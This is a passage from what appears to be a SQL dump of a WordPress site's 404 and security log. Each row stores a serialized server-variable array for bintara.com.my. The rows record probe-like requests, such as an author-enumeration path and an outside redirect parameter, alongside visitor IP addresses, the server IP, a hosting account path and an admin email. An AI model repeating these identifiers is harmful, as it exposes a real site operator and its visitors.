Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbDEy2ngQRwkUD6JqiP6aQAAAMc\";s:19:\"REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbDEy2ngQRwkUD6JqiP6aQAAAMc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"66.249.71.8\";s:11:\"REMOTE_PORT\";s:5:\"55713\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:10:\"SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbDEy2ngQRwkUD6JqiP6aQAAAMc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571865803.2971\";s:12:\"REQUEST_TIME\";s:10:\"1571865803\";}}','notice','2019-10-23 21:23:26','2019-10-23 21:23:23',34483272,34839832,'https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js?ver=1',1,0,'66.249.71.8'),(28877,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:111:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:109:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"209.99.129.122\";s:11:\"REMOTE_PORT\";s:5:\"54115\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbDdwOSbcgsmbEQEC1YlKgAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571872192.9105\";s:12:\"REQUEST_TIME\";s:10:\"1571872192\";}}','notice','2019-10-23 23:09:55','2019-10-23 23:09:53',35318608,37124968,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'209.99.129.122'),(28878,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MANMJS; rv:11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"60588\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbDi4JqgWGLDEoi25PsMgAAAAg4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571873505.5797\";s:12:\"REQUEST_TIME\";s:10:\"1571873505\";}}','notice','2019-10-23 23:31:47','2019-10-23 23:31:45',34922936,36721648,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(28879,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:123:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"66.110.216.221\";s:11:\"REMOTE_PORT\";s:5:\"37272\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbDoKJqgWGLDEoi25PsOUwAAAhc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571874856.4305\";s:12:\"REQUEST_TIME\";s:10:\"1571874856\";}}','notice','2019-10-23 23:54:19','2019-10-23 23:54:16',35313560,37105592,'https://bintara.com.my/?page_id=18',1,0,'66.110.216.221'),(28880,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/author/admin/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:140:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 OPR/40.0.2308.81 (Edition Yx)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/author/admin/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbDtzomVmdgDIdj8xQAXHgAAAlU\";s:12:\"REDIRECT_URL\";s:14:\"/author/admin/\";s:11:\"REMOTE_ADDR\";s:11:\"196.3.97.70\";s:11:\"REMOTE_PORT\";s:5:\"52683\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:10:\"SCRIPT_URL\";s:14:\"/author/admin/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbDtzomVmdgDIdj8xQAXHgAAAlU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571876302.1906\";s:12:\"REQUEST_TIME\";s:10:\"1571876302\";}}','notice','2019-10-24 00:18:25','2019-10-24 00:18:22',35363864,37168976,'https://bintara.com.my/author/admin/',1,0,'196.3.97.70'),(28881,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"D2C15943-82C8-414D-A974-B2D9C102A46E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbDxSomVmdgDIdj8xQAYUQAAAkc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.216\";s:11:\"REMOTE_PORT\";s:5:\"55402\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbDxSomVmdgDIdj8xQAYUQAAAkc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571877194.5021\";s:12:\"REQUEST_TIME\";s:10:\"1571877194\";}}','notice','2019-10-24 00:33:17','2019-10-24 00:33:14',35729192,37523592,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.216'),(28882,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"10F396E4-D50D-484E-A0AA-18685B964D16\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbDx9F-4xFI9b97jkRjlWgAAAY8\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.216\";s:11:\"REMOTE_PORT\";s:5:\"50404\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbDx9F-4xFI9b97jkRjlWgAAAY8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571877364.4093\";s:12:\"REQUEST_TIME\";s:10:\"1571877364\";}}','notice','2019-10-24 00:36:07','2019-10-24 00:36:04',35670384,37471312,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.216'),(28883,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"D9FF2ECD-21FE-40D1-B098-D1F0369D1356\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbD58Kw5Jlat30Wq3qoEywAAABI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.216\";s:11:\"REMOTE_PORT\";s:5:\"59971\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbD58Kw5Jlat30Wq3qoEywAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571879408.7299\";s:12:\"REQUEST_TIME\";s:10:\"1571879408\";}}','notice','2019-10-24 01:10:11','2019-10-24 01:10:09',35671040,37470056,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.216'),(28884,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"F125C224-D5C3-4AF1-9387-5F796B5D99D7\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbERAKw5Jlat30Wq3qoYvAAAAA0\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.145.118.212\";s:11:\"REMOTE_PORT\";s:5:\"50343\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\"